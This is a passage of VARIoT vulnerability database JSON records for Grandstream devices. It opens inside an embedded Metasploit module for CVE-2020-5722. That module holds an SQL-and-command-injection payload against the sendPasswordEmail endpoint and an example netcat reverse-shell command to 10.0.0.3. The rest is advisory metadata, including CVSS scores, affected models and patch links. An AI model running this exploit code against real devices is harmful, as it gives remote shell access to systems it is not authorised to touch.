this:\n #\n # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \\\n # password \u0027\u0027 `cat \u003c\u003c\u0027TTsf7G0\u0027 z\u0027 or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `\n #\n # This functionality is related to the\"Forgot Password\" feature. This function is rate limited by\n # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few\n # payloads are appropriate. \n ###\n def execute_command(cmd, _opts = {})\n rand_num = Rex::Text.rand_text_numeric(1..5)\n res = send_request_cgi({\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027/cgi\u0027),\n \u0027vars_post\u0027 =\u003e\n {\n \u0027action\u0027 =\u003e \u0027sendPasswordEmail\u0027,\n \u0027user_name\u0027 =\u003e \"\u0027 or #{rand_num}=#{rand_num}--`;`#{cmd}`;`\"\n }\n }, 5)\n\n # the netcat reverse shell payload holds the connection open. So we\u0027ll treat no response\n # as a success. The meterpreter payload does not hold the connection open so this clause digs\n # deeper to ensure it succeeded. The server will respond with a non-0 status if the payload\n # generates an error (e.g. rate limit error)\n if res\n fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a 200 OK\u0027) unless res.code == 200\n\n body_json = res.get_json_document\n fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a JSON body\u0027) unless body_json\n\n status_json = body_json[\u0027status\u0027]\n fail_with(Failure::UnexpectedReply, \u0027The JSON response is missing the status element\u0027) unless status_json\n fail_with(Failure::UnexpectedReply, \"The server responded with an error status #{status_json}\") unless status_json == 0\n end\n\n print_good(\u0027Exploit successfully executed.\u0027)\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore[\u0027PAYLOAD\u0027]}\")\n case target[\u0027Type\u0027]\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"db": "PACKETSTORM",
"id": "165708"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=48247",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-5722"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-5722",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "156876",
"trust": 3.1
},
{
"db": "PACKETSTORM",
"id": "165708",
"trust": 1.8
},
{
"db": "TENABLE",
"id": "TRA-2020-15",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "48247",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2020-23201",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1337",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-5722",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "PACKETSTORM",
"id": "165708"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
},
{
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"id": "VAR-202003-1435",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
}
],
"trust": 1.45714287
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
}
]
},
"last_update_date": "2024-01-18T22:55:19.159000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
},
{
"title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-23201)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/214293"
},
{
"title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=112779"
},
{
"title": "Known Exploited Vulnerabilities Detector",
"trust": 0.1,
"url": "https://github.com/ostorlab/kev "
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.7,
"url": "http://packetstormsecurity.com/files/156876/ucm6202-1.0.18.13-remote-command-injection.html"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/165708/grandstream-ucm62xx-ip-pbx-sendpasswordemail-remote-code-execution.html"
},
{
"trust": 1.7,
"url": "https://www.tenable.com/security/research/tra-2020-15"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5722"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5722"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/48247"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/89.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/"
},
{
"trust": 0.1,
"url": "http://www.grandstream.com/\","
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "PACKETSTORM",
"id": "165708"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
},
{
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "PACKETSTORM",
"id": "165708"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
},
{
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"date": "2020-03-23T00:00:00",
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"date": "2020-04-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"date": "2022-01-25T16:34:16",
"db": "PACKETSTORM",
"id": "165708"
},
{
"date": "2020-03-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1337"
},
{
"date": "2020-03-23T20:15:12.043000",
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"date": "2022-02-10T00:00:00",
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"date": "2020-04-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"date": "2022-01-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1337"
},
{
"date": "2022-02-10T07:31:15.567000",
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "165708"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream UCM6200 In the series SQL Injection vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
}
],
"trust": 0.6
}
}
VAR-201904-0582
Vulnerability from variot - Updated: 2023-12-18 13:52A Malformed Input String to /cgi-bin/delete_CA on Grandstream GXP16xx VoIP 1.0.4.128 phones allows attackers to delete configuration parameters and gain admin access to the device. Grandstream GXP16xx VoIP phone Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream GXP16xx VoIP is a 16XX series IP phone of Grandstream. An input validation error vulnerability exists in Grandstream GXP16xx VoIP version 1.0.4.128. The vulnerability stems from the failure of the network system or product to properly validate the input data
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201904-0582",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gxp1610",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1615",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1620",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1625",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1628",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1630",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015195"
},
{
"db": "NVD",
"id": "CVE-2018-17564"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1610_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1610:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1615_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1615:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1620_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1620:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1625_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1625:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1628_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1628:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1630_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1630:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-17564"
}
]
},
"cve": "CVE-2018-17564",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-17564",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-128036",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-17564",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-17564",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201904-033",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-128036",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128036"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015195"
},
{
"db": "NVD",
"id": "CVE-2018-17564"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-033"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Malformed Input String to /cgi-bin/delete_CA on Grandstream GXP16xx VoIP 1.0.4.128 phones allows attackers to delete configuration parameters and gain admin access to the device. Grandstream GXP16xx VoIP phone Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream GXP16xx VoIP is a 16XX series IP phone of Grandstream. An input validation error vulnerability exists in Grandstream GXP16xx VoIP version 1.0.4.128. The vulnerability stems from the failure of the network system or product to properly validate the input data",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-17564"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015195"
},
{
"db": "VULHUB",
"id": "VHN-128036"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-17564",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015195",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201904-033",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-128036",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128036"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015195"
},
{
"db": "NVD",
"id": "CVE-2018-17564"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-033"
}
]
},
"id": "VAR-201904-0582",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-128036"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:52:22.654000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Important Firmware News (HD IP Phones)",
"trust": 0.8,
"url": "http://www.grandstream.com/support/firmware"
},
{
"title": "Grandstream GXP16xx VoIP Fixes for access control error vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=90945"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015195"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-033"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-284",
"trust": 0.9
},
{
"problemtype": "CWE-20",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128036"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015195"
},
{
"db": "NVD",
"id": "CVE-2018-17564"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://grandstream.com/support/firmware"
},
{
"trust": 1.7,
"url": "https://iridiumxor.wordpress.com/2019/01/03/three-simple-cves-for-a-good-voip-phone/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-17564"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-17564"
},
{
"trust": 0.6,
"url": "http://www.iridiumxor.blog/2019/01/three-simple-cves-for-a-good-voip-phone/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128036"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015195"
},
{
"db": "NVD",
"id": "CVE-2018-17564"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-033"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-128036"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015195"
},
{
"db": "NVD",
"id": "CVE-2018-17564"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-033"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-01T00:00:00",
"db": "VULHUB",
"id": "VHN-128036"
},
{
"date": "2019-05-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015195"
},
{
"date": "2019-04-01T21:29:26.013000",
"db": "NVD",
"id": "CVE-2018-17564"
},
{
"date": "2019-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201904-033"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-128036"
},
{
"date": "2019-05-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015195"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2018-17564"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201904-033"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201904-033"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GXP16xx VoIP phone Access control vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015195"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201904-033"
}
],
"trust": 0.6
}
}
VAR-201711-0062
Vulnerability from variot - Updated: 2023-12-18 13:48Cross-Site Request Forgery (CSRF) in /cgi-bin/login on Vonage (Grandstream) HT802 devices allows attackers to authenticate a user via the login screen using the default password of 123 and submit arbitrary requests. Vonage (Grandstream) HT802 The device contains a cross-site request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Vonage (Grandstream) HT802devices is a home gateway device from Vonage, USA. A remote attacker can exploit this vulnerability to log in to the target device
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
